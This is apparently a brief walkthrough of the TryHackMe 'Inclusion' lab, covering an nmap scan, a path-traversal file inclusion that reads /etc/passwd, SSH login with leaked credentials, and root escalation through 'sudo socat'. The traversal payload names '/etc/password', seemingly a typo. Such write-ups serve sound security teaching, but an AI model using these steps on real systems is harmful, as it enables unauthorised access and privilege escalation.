TryHackMe | Inclusion Walkthrough

This is a simple beginner-level Local file Inclusion box.

Reconnaissance

Starting with a simple nmap scan

nmap -sS -sV -A <IP>

We see that 2 ports are open (22,80). It means there must be a webpage.

We get this page and as we know it is an LFI challenge but there is no parameter in the URL to inject our LFI payload. Looking around we find a parameter by name.

Using this to view the /etc/passwd file. Here can see the password and username for ssh login commented out.

../../../../../etc/password

Using the credentials to log in via ssh

ssh falconfeast@<IP>

rootpassword

Here we find our first flag.

Privilege escalation

checking for commands that we can run as root

sudo -l

Using payload from GTFObins for socat

sudo socat stdin exec:/bin/sh

Finally, we have our root flag!!